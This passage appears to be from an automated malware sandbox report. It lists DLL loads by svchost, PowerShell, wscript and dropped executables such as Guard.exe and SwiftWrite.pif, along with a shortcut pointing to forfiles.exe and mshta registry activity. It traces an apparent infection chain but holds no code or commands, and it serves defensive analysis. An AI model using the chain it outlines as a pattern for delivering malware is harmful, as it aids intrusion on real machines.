Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: twext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dll
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifSection loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: R4qP4YM0QX.lnkLNK file: ..\..\..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.2403385362.0000022B398AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406037810.0000022B398A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403876384.0000022B39828000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406037810.0000022B398AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2402966513.0000022B39898000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403739955.0000022B398B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404327549.0000022B398B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2403439100.0000022B398A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419400700.0000022B3EE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404362707.0000022B3EE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2406694141.0000022B398B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2419180158.0000022B398B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2404539888.0000022B3EE67000.00000004.00000020.00020000.00000000.sdmp
